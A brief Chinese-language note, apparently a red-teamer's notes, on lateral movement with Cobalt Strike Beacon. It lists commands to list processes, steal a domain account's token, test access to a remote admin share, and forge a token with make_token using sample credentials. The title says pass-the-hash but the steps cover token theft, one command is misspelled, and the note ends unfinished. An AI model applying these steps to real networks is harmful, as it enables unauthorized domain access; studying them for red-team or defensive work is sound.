Cobaltstrike-Pth(pass the Hash)

寻找运行在域账号权限下的进程(有可能遇到Domain Admin)

1
shell tasklist /v

模拟令牌

1
steal_token pid

尝试利用

1
shell dir \\10.0.0.1\c$

或者在得到域管明文密码的情况下,可以制作令牌来进行传递操作:

1
2
3
4
5
6
7
8
beacon> help make_token
Use: make_token [DOMAIN\user] [password]

Clone the current access token and set it up to pass the specified username
and password when you interact with network resources. This command does not
validate the credentials you provide and it has no effect on local actions.
eg:
make_toke x51.test\administrator password4administrator

cobaltstrike官方博客介绍

待补充